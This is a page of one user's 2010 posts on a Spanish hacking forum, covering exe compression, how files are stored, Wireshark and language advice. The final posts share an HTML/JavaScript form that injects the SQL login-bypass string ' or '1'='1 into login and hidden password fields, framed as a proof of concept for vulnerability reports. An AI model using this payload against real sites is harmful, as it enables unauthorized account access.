elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 [10] 11 12 13 14 15 16
91  Programación / .NET (C#, VB.NET, ASP) / Re: Coprimir exe de proyecto c# en Visual Studio 2008 en: 22 Octubre 2010, 01:00 am
UPX
92  Foros Generales / Dudas Generales / Re: Como abrir algun programa Remotamente - Nuevo asunto en: 22 Octubre 2010, 00:56 am
Ese servicio se puede desactivar.
http://spamloco.net/2007/05/net-send-enviar-mensajes-de-alerta-en.html
93  Foros Generales / Dudas Generales / Re: Los Archivos Son Materia ¿? en: 21 Octubre 2010, 04:15 am
Citar
se convierte en binarios por asi decirlo (cierto no ¿?)
Es binario por la razón que explica JDC, los ordenadores funcionan con biestables, elementos físicos que pueden tener dos estados.
Para quisquillosos: Si. Ya se que en computación cuántica... que hay muchos estados cuánticos... xD

Un archivo fisicamente se puede almacenar de muchas maneras. Por ejemplo:
En un CD-Rom para escribir se hacen agujeritos (entonces el estado es agujerito o no agujerito), en un disco duro o en un diskette son imantaciones (imantado o no imantado). Por convenio, por coste, por comodidad, etc.. se decide el código. Un ejemplo: imantado significa 1 y no imantado significa 0.

Para eliminar un archivo yo conozco dos formas de hacerlo.
La primera es de hacerlo a nivel lógico: se marca diciendo que ese archivo está eliminado lo que permite sobreescribir en la zona. Obviamente se modifica fisicamente el disco.
La segunda es de forma física: Los datos se machacan, es decir, se quitan las imantaciones del disco. Lo que logicamente supone cambiar esa información útil por ceros.

Entonces atendiendo a la definición de: La Materia es todo aquello que tiene masa y ocupa un lugar en el espacio. Es evidente que los electrones tienen masa, aunque muy pequeña, y los componentes de un CD tienen masa, y porsupuesto ambos ocupan un lugar en el espacio.
94  Seguridad Informática / Hacking Wireless / Re: ¿Qué sniffer me recomendais? en: 11 Octubre 2010, 14:50 pm
Wireshark es un buen sniffer, sirve para redes inalámbricas, seguramente necesites un driver para tu tarjeta de red que te permita ponerla en modo monitor.

Saludos :-)
95  Foros Generales / Noticias / Re: Anonymous declara la guerra a la SGAE en: 11 Octubre 2010, 05:51 am
Solo tengo una cosa que decir a la SGAE:
96  Foros Generales / Foro Libre / Re: Q lenguaje de programacion me recomiendan aprender???? en: 10 Octubre 2010, 06:04 am
Si quieres algo independiente del S.O. yo te recomiendo Python (ojo a la versión del compilador si sigues un tutorial), Java, C, Perl... Lee sobre ellos y escoge el que mas te guste.
Para programar en java hay un editor muy chulo para aprender que se llama blueJ, está programado en java y te permite ver graficamente como se relacionan las clases y hacer pruebas con el código que escribes.
97  Foros Generales / Noticias / Re: Anonymous declara la guerra a la SGAE en: 6 Octubre 2010, 23:08 pm
Fuck SGAE!! Hay que darle caña por todos lados >:D
98  Seguridad Informática / Bugs y Exploits / Re: Reportar inyecciones SQL en: 6 Octubre 2010, 00:05 am
@SnakingMax, para vos que es reportar?

Pues para mi reportar es informar de algo (dar un reporte), y en este caso el reporte es una prueba del concepto.
Y si quieres adjuntas también info sobre como se corrige la vulnerabilidad desde la BD o desde el propio código PHP filtrando los caracteres que no se desean.

También podría haber puesto como título del post lanzador de inyecciones sql, pero le veo mejor utilidad al código como reporte en un correo electrónico.

Si me equivoco corrígeme, estoy en el foro para aprender y para aportar en lo que pueda  :D
99  Seguridad Informática / Bugs y Exploits / Re: Reportar inyecciones SQL en: 5 Octubre 2010, 23:38 pm
Me había olvidado cambiar la inyección que tenía por ' or '1' = '1 y también desocultar un campo que tenía de tipo password. En la inyección en la que lo utilicé el campo password se modifica así que no se puede inyectar ahí.

Saludos
100  Seguridad Informática / Bugs y Exploits / Reportar inyecciones SQL en: 5 Octubre 2010, 23:19 pm
Os dejo un código muy sencillo en html+javascript que he utilizado para reportar inyecciones sql. Sin tener conocimientos de informática a cualquiera que se le haga el reporte puede comprobar la vulnerabilidad.


Código
  1. <script language="javascript">
  2.  
  3. function enviar()
  4. {
  5. document.getElementById('valor1').value = "' or '1'='1"+document.getElementById('valor1').value;
  6. return true;
  7. }
  8.  
  9. </script>
  10.  
  11. Acceder al primer usuario cuyo LOGIN sea:
  12.  
  13. <form method="post" action="http://www.laweb.com/accion" onsubmit="enviar();">
  14. <input name="login" id="valor1" type="text">
  15. <input name="password" value="' or '1'='1" id="valor2" type="hidden">
  16. <input value="Enviar" type="submit">
  17.  
  18. </form>
Páginas: 1 2 3 4 5 6 7 8 9 [10] 11 12 13 14 15 16
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines